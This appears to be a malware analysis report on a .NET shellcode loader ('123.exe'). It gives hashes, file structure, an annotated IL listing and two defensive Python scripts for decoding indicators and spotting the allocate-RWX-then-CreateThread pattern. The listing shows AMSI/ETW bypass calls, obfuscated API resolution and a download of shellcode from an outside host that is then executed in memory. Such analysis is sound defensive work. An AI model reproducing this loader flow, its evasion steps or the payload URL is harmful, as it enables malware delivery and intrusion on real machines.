Suspicious
Suspect

b3a2b2125bd46e90590d66270061f7dd
PE Executable | MD5: b3a2b2125bd46e90590d66270061f7dd | Size: 10.75 KB | application/x-dosexec

Summary by MalvaGPT
Characteristics
Symbol Obfuscation Score: Low

Hashes
MD5: b3a2b2125bd46e90590d66270061f7dd
SHA1: f23f8b6501e356574122b08340c886e9cd96f12b
SHA256: 8bedd9a6bc1b9fa0a9158352dae15181e354e187da8ea79c61418802d96b34b5
SHA384: bad13ab465ae24bc47cd692234547bbeb8548af1a5ff5c4dab3bbaaf086ff4d1899f25ff02e99012cca8755ac1da8ab4
SHA512: 8e22a2c40df0f6fd6cf84cf71e4f6695e9617e74f7881e8c4ff4d52d980f116b1e51ae80b51916da9d9be17c0280f2bf4e621eb94c64ffebb003c0368967786e
SSDeep: 192:vYycF0sil5/2HUy78SyvqBOeIpTaBOtQbM3aL:vYZF0qEqIeIeBOy
TLSH: C6220901B7F88A95D83E1776D8B307416774A54B4B26CB8F14CD922F2EB33D04196BB2
File Structure
  DosHeader
  PE Header
  Optional Header (x86)
  Section Headers
    .text
    .rsrc
    .reloc
  Resources
    RT_VERSION
      ID:0001
        ID:0
    RT_MANIFEST
      ID:0001
        ID:0
Information
PE Detect: PeReader OK (file layout)
Module Name: 123.exe
Full Name: 123.exe
EntryPoint: System.Void Loader::Main()
Scope Name: 123.exe
Scope Type: ModuleDef
Kind: Windows (GUI subsystem, so no console window is shown even though Main logs every step)
Runtime Version: v4.0.30319
Tables Header Version: 512 (0x0200, i.e. metadata tables version 2.0)
WinMD Version: <null>
Assembly Name: 123
Assembly Version: 0.0.0.0
Assembly Culture: <null>
Has PublicKey: False (unsigned assembly)
PublicKey Token: <null>
Target Framework: <null>
Total Strings: 36
Main Method: System.Void Loader::Main()
Main IL Instruction Count: 197
Main IL

Read top to bottom, Main does the following: it logs a start banner, calls Loader::BypassAmsi() and Loader::BypassEtw() (only their names are visible here, not their bodies), resolves kernel32.dll with Loader::GetModuleHandle and then VirtualAlloc, CreateThread and WaitForSingleObject through Loader::GetApi<T>. Every name, and the download URL, is passed through Loader::D first; the literals are plain base64 of the clear-text names (decodings are given in the comments below). It then fetches a blob with Loader::DownloadShellcode(string), runs it through Loader::SgnDecode, allocates a buffer of the decoded size with MEM_COMMIT | MEM_RESERVE and PAGE_EXECUTE_READWRITE, copies the bytes in with Marshal.Copy, starts a thread at the buffer with CreateThread and blocks on WaitForSingleObject(INFINITE). Every failure path logs a message and leaves to the ret at IL_023E; the whole body sits in a try/catch whose handler logs the exception. Note that the buffer is allocated RWX in one step rather than RW then RX, a pattern memory scanners specifically look for.

Listing (one instruction per line; the dumper's `<null>` operand placeholders are dropped, branch targets are shown as labels, and English translations of the Chinese log strings, base64 decodings and Win32 constant names are added as // comments; the literals themselves are left verbatim so they remain searchable):

    nop
    ldstr "=== SGN Loader 开始执行 ==="                  // "=== SGN Loader starting ==="
    call System.Void Loader::Log(System.String)
    nop
    nop
    call System.Void Loader::BypassAmsi()
    nop
    call System.Void Loader::BypassEtw()
    nop
    ldstr "a2VybmVsMzIuZGxs"                            // base64 -> "kernel32.dll"
    call System.String Loader::D(System.String)
    call System.IntPtr Loader::GetModuleHandle(System.String)
    stloc.0                                             // V_0 = hKernel32
    ldloc.0
    ldsfld System.IntPtr System.IntPtr::Zero
    call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr)
    stloc.s V_10
    ldloc.s V_10
    brfalse.s IL_004B
    nop
    ldstr "[-] GetModuleHandle 失败"                     // "[-] GetModuleHandle failed"
    call System.Void Loader::Log(System.String)
    nop
    leave IL_023E
IL_004B:
    ldstr "[+] kernel32.dll 加载成功"                    // "[+] kernel32.dll loaded"
    call System.Void Loader::Log(System.String)
    nop
    ldloc.0
    ldstr "VmlydHVhbEFsbG9j"                            // base64 -> "VirtualAlloc"
    call System.String Loader::D(System.String)
    call Loader/VirtualAlloc Loader::GetApi<Loader/VirtualAlloc>(System.IntPtr,System.String)
    stloc.1                                             // V_1 = VirtualAlloc delegate
    ldloc.0
    ldstr "Q3JlYXRlVGhyZWFk"                            // base64 -> "CreateThread"
    call System.String Loader::D(System.String)
    call Loader/CreateThread Loader::GetApi<Loader/CreateThread>(System.IntPtr,System.String)
    stloc.2                                             // V_2 = CreateThread delegate
    ldloc.0
    ldstr "V2FpdEZvclNpbmdsZU9iamVjdA=="                // base64 -> "WaitForSingleObject"
    call System.String Loader::D(System.String)
    call Loader/WaitForSingleObject Loader::GetApi<Loader/WaitForSingleObject>(System.IntPtr,System.String)
    stloc.3                                             // V_3 = WaitForSingleObject delegate
    ldloc.1
    brfalse.s IL_0095
    ldloc.2
    brfalse.s IL_0095
    ldloc.3
    ldnull
    ceq
    br.s IL_0096
IL_0095:
    ldc.i4.1
IL_0096:
    stloc.s V_11                                        // V_11 = "some delegate is null"
    ldloc.s V_11
    brfalse.s IL_00AD
    nop
    ldstr "[-] API 解析失败"                             // "[-] API resolution failed"
    call System.Void Loader::Log(System.String)
    nop
    leave IL_023E
IL_00AD:
    ldstr "[+] API 解析成功"                             // "[+] API resolution succeeded"
    call System.Void Loader::Log(System.String)
    nop
    ldstr "aHR0cDovL3RocmVhZGV0LnRvcC8xMTEuYmlu"        // base64 -> "http://threadet.top/111.bin"
    call System.String Loader::D(System.String)
    call System.Byte[] Loader::DownloadShellcode(System.String)
    stloc.s V_4                                         // V_4 = downloaded blob
    ldloc.s V_4
    brfalse.s IL_00D5
    ldloc.s V_4
    ldlen
    ldc.i4.0
    ceq
    br.s IL_00D6
IL_00D5:
    ldc.i4.1
IL_00D6:
    stloc.s V_12                                        // V_12 = "blob is null or empty"
    ldloc.s V_12
    brfalse.s IL_00ED
    nop
    ldstr "[-] 下载失败"                                 // "[-] Download failed"
    call System.Void Loader::Log(System.String)
    nop
    leave IL_023E
IL_00ED:
    ldstr "[+] 下载完成,原始大小: {0} 字节"               // "[+] Download complete, raw size: {0} bytes"
    ldloc.s V_4
    ldlen
    conv.i4
    box System.Int32
    call System.String System.String::Format(System.String,System.Object)
    call System.Void Loader::Log(System.String)
    nop
    ldloc.s V_4
    call System.Byte[] Loader::SgnDecode(System.Byte[])
    stloc.s V_5                                         // V_5 = decoded shellcode
    ldstr "[+] SGN 解码成功,解码后大小: {0} 字节"          // "[+] SGN decode succeeded, decoded size: {0} bytes"
    ldloc.s V_5
    ldlen
    conv.i4
    box System.Int32
    call System.String System.String::Format(System.String,System.Object)
    call System.Void Loader::Log(System.String)
    nop
    ldloc.1
    ldsfld System.IntPtr System.IntPtr::Zero            // lpAddress = NULL
    ldloc.s V_5
    ldlen
    conv.i4                                             // dwSize = decoded length
    ldc.i4 12288                                        // 0x3000 = MEM_COMMIT | MEM_RESERVE
    ldc.i4.s 64                                         // 0x40 = PAGE_EXECUTE_READWRITE
    callvirt System.IntPtr Loader/VirtualAlloc::Invoke(System.IntPtr,System.UInt32,System.UInt32,System.UInt32)
    stloc.s V_6                                         // V_6 = RWX buffer
    ldloc.s V_6
    ldsfld System.IntPtr System.IntPtr::Zero
    call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr)
    stloc.s V_13
    ldloc.s V_13
    brfalse.s IL_0163
    nop
    ldstr "[-] VirtualAlloc 失败"                        // "[-] VirtualAlloc failed"
    call System.Void Loader::Log(System.String)
    nop
    leave IL_023E
IL_0163:
    ldstr "[+] 内存分配成功: 0x{0:X16}"                  // "[+] Memory allocated: 0x{0:X16}"
    ldloca.s V_6
    call System.Int64 System.IntPtr::ToInt64()
    box System.Int64
    call System.String System.String::Format(System.String,System.Object)
    call System.Void Loader::Log(System.String)
    nop
    ldloc.s V_5
    ldc.i4.0
    ldloc.s V_6
    ldloc.s V_5
    ldlen
    conv.i4
    call System.Void System.Runtime.InteropServices.Marshal::Copy(System.Byte[],System.Int32,System.IntPtr,System.Int32)
    nop
    ldstr "[+] Shellcode 已写入内存"                     // "[+] Shellcode written to memory"
    call System.Void Loader::Log(System.String)
    nop
    ldc.i4.0
    stloc.s V_7                                         // V_7 = thread id (out parameter)
    ldloc.2
    ldsfld System.IntPtr System.IntPtr::Zero            // lpThreadAttributes = NULL
    ldc.i4.0                                            // dwStackSize = 0
    ldloc.s V_6                                         // lpStartAddress = RWX buffer
    ldsfld System.IntPtr System.IntPtr::Zero            // lpParameter = NULL
    ldc.i4.0                                            // dwCreationFlags = 0 (runs immediately)
    ldloca.s V_7                                        // lpThreadId
    callvirt System.IntPtr Loader/CreateThread::Invoke(System.IntPtr,System.UInt32,System.IntPtr,System.IntPtr,System.UInt32,System.UInt32&)
    stloc.s V_8                                         // V_8 = hThread
    ldloc.s V_8
    ldsfld System.IntPtr System.IntPtr::Zero
    call System.Boolean System.IntPtr::op_Equality(System.IntPtr,System.IntPtr)
    stloc.s V_14
    ldloc.s V_14
    brfalse.s IL_01D4
    nop
    ldstr "[-] CreateThread 失败"                        // "[-] CreateThread failed"
    call System.Void Loader::Log(System.String)
    nop
    leave.s IL_023E
IL_01D4:
    ldstr "[+] 线程创建成功,TID: {0}"                    // "[+] Thread created, TID: {0}"
    ldloc.s V_7
    box System.UInt32
    call System.String System.String::Format(System.String,System.Object)
    call System.Void Loader::Log(System.String)
    nop
    ldloc.3
    ldloc.s V_8
    ldc.i4.m1                                           // 0xFFFFFFFF = INFINITE
    callvirt System.UInt32 Loader/WaitForSingleObject::Invoke(System.IntPtr,System.UInt32)
    stloc.s V_9                                         // V_9 = wait result
    ldloc.s V_9
    brfalse.s IL_020D                                   // 0 = WAIT_OBJECT_0
    ldstr "[-] Wait 失败: 0x{0:X}"                       // "[-] Wait failed: 0x{0:X}"
    ldloc.s V_9
    box System.UInt32
    call System.String System.String::Format(System.String,System.Object)
    br.s IL_0212
IL_020D:
    ldstr "[+] Shellcode 执行完成"                       // "[+] Shellcode execution finished"
IL_0212:
    call System.Void Loader::Log(System.String)
    nop
    nop
    leave.s IL_0233
    // catch handler: the exception object is on the stack on entry
    stloc.s V_15
    nop
    ldstr "[!] 异常: {0}"                                // "[!] Exception: {0}"
    ldloc.s V_15
    call System.String System.String::Format(System.String,System.Object)
    call System.Void Loader::Log(System.String)
    nop
    nop
    leave.s IL_0233
IL_0233:
    ldstr "=== Loader 结束 ==="                          // "=== Loader finished ==="
    call System.Void Loader::Log(System.String)
    nop
IL_023E:
    ret
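The obfuscated literals and the VirtualAlloc arguments can be recovered mechanically from a dump like the one above. The script below is an added triage example written for this page, not output of the analysis tool or code from the sample: it pulls every ldstr operand that is fed to Loader::D, decodes it as base64 (that Loader::D is a plain base64 decoder is an inference; it holds because every literal decodes to a sensible ASCII name), expands the MEM_* and PAGE_* constants of the VirtualAlloc call, and sorts the results into modules, API names and URLs. The embedded IL_DUMP is an excerpt of the Main IL listing on this page, trimmed to the relevant instructions.

```python
"""Triage helper for a dnlib-style IL dump of a .NET shellcode loader.

Added example for this page; not the analysis tool's code and not the sample's.
"""
import base64
import binascii
import re

# Excerpt of the Main IL listing above, reduced to the operand-bearing
# instructions that matter for triage (same order as in the sample).
IL_DUMP = """
ldstr a2VybmVsMzIuZGxs call System.String Loader::D(System.String) call System.IntPtr Loader::GetModuleHandle(System.String)
ldstr VmlydHVhbEFsbG9j call System.String Loader::D(System.String)
ldstr Q3JlYXRlVGhyZWFk call System.String Loader::D(System.String)
ldstr V2FpdEZvclNpbmdsZU9iamVjdA== call System.String Loader::D(System.String)
ldstr aHR0cDovL3RocmVhZGV0LnRvcC8xMTEuYmlu call System.String Loader::D(System.String) call System.Byte[] Loader::DownloadShellcode(System.String)
ldc.i4 12288 ldc.i4.s 64 callvirt System.IntPtr Loader/VirtualAlloc::Invoke(System.IntPtr,System.UInt32,System.UInt32,System.UInt32)
"""

# Every ldstr whose result goes straight into Loader::D, the sample's string
# decoder. Treating D as base64 is an inference from the decoded results.
_OBF = re.compile(r"ldstr (\S+) call System\.String Loader::D\(System\.String\)")
# The two integer pushes immediately before the VirtualAlloc delegate call:
# flAllocationType and flProtect.
_VALLOC = re.compile(
    r"ldc\.i4(?:\.s)? (\d+) ldc\.i4(?:\.s)? (\d+) callvirt \S+ Loader/VirtualAlloc::Invoke"
)

MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x400000: "MEM_TOP_DOWN"}
PAGE_PROT = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}


def try_base64(literal: str):
    """Return the decoded text if `literal` is valid base64 of printable ASCII, else None."""
    try:
        raw = base64.b64decode(literal, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def decode_obfuscated_strings(il: str) -> dict:
    """Map each literal passed to Loader::D to its decoded value (None if not base64)."""
    return {lit: try_base64(lit) for lit in _OBF.findall(il)}


def describe_virtualalloc(il: str):
    """Expand the allocation-type and protection arguments of the VirtualAlloc call."""
    m = _VALLOC.search(il)
    if not m:
        return None
    alloc, prot = int(m.group(1)), int(m.group(2))
    names = [name for bit, name in MEM_FLAGS.items() if alloc & bit]
    return "|".join(names), PAGE_PROT.get(prot, hex(prot))


def extract_iocs(il: str) -> dict:
    """Split the decoded strings into modules, resolved API names and network indicators."""
    decoded = [v for v in decode_obfuscated_strings(il).values() if v]
    return {
        "modules": [v for v in decoded if v.lower().endswith(".dll")],
        "apis": [v for v in decoded if v[:1].isupper() and "." not in v],
        "urls": [v for v in decoded if v.startswith(("http://", "https://"))],
    }


if __name__ == "__main__":
    for lit, val in decode_obfuscated_strings(IL_DUMP).items():
        print(f"{lit:40} -> {val}")
    print("VirtualAlloc:", describe_virtualalloc(IL_DUMP))
    print("IOCs:", extract_iocs(IL_DUMP))
```

`validate=True` matters: without it `b64decode` silently discards non-alphabet characters and will happily "decode" ordinary log strings into garbage, which is how false IOCs get into a report.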

Characteristics
No malware configuration was found at this point.
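At runtime the Main method above reduces to one observable sequence: VirtualAlloc with PAGE_EXECUTE_READWRITE, a copy into the returned region, and CreateThread with lpStartAddress inside that region. The matcher below is an added example written for this page (not part of this report and not from any sandbox or EDR product) that flags exactly that pairing over API-trace lines. The `pid api(args) = retval` line format and the five trace lines are constructed for illustration; the first process mimics what this sample would produce, the second shows a benign RW allocation and an ordinary thread start that must not match.

```python
"""Behavioural check for the allocate-RWX / CreateThread-into-it pattern.

Added example for this page. The trace format and lines are constructed for
illustration; they are not output of the sandbox that produced this report.
"""
import re
from collections import defaultdict

TRACE = """\
4120 VirtualAlloc(lpAddress=0x0, dwSize=0x2a3, flAllocationType=0x3000, flProtect=0x40) = 0x1e50000
4120 CreateThread(lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x1e50000, lpParameter=0x0, dwCreationFlags=0x0) = 0x2c4
4120 WaitForSingleObject(hHandle=0x2c4, dwMilliseconds=0xffffffff) = 0x0
5308 VirtualAlloc(lpAddress=0x0, dwSize=0x1000, flAllocationType=0x3000, flProtect=0x4) = 0x5a0000
5308 CreateThread(lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x7ff6a1b21000, lpParameter=0x0, dwCreationFlags=0x0) = 0x1f0
"""

PAGE_EXECUTE_READWRITE = 0x40
# "<pid> <api>(<k=v, ...>) = <hex retval>"; the constructed format used by TRACE.
LINE = re.compile(r"^(\d+) (\w+)\((.*)\) = (0x[0-9a-fA-F]+)$")


def parse_trace(text: str):
    """Yield (pid, api, {arg: int}, retval) for each well-formed trace line."""
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        pid, api, argstr, ret = m.groups()
        args = {}
        for kv in argstr.split(","):
            key, val = kv.strip().split("=")
            args[key] = int(val, 16)
        yield int(pid), api, args, int(ret, 16)


def find_rwx_thread_starts(text: str):
    """Return (pid, region_base, region_size, start_address) for every CreateThread
    whose start address lies inside a region the same process allocated RWX."""
    rwx_regions = defaultdict(list)  # pid -> [(base, size)]
    hits = []
    for pid, api, args, ret in parse_trace(text):
        if (api == "VirtualAlloc"
                and args.get("flProtect") == PAGE_EXECUTE_READWRITE
                and ret != 0):
            rwx_regions[pid].append((ret, args["dwSize"]))
        elif api == "CreateThread":
            start = args.get("lpStartAddress", 0)
            for base, size in rwx_regions[pid]:
                if base <= start < base + size:
                    hits.append((pid, base, size, start))
    return hits


if __name__ == "__main__":
    for pid, base, size, start in find_rwx_thread_starts(TRACE):
        print(f"pid {pid}: thread start {start:#x} inside RWX region "
              f"{base:#x}+{size:#x}")
```

The check keys on the region returned by VirtualAlloc rather than on the call itself, because an RWX allocation alone is noisy (JITs do it) while a new thread whose entry point sits in freshly allocated RWX memory is the specific thing this loader does with V_6.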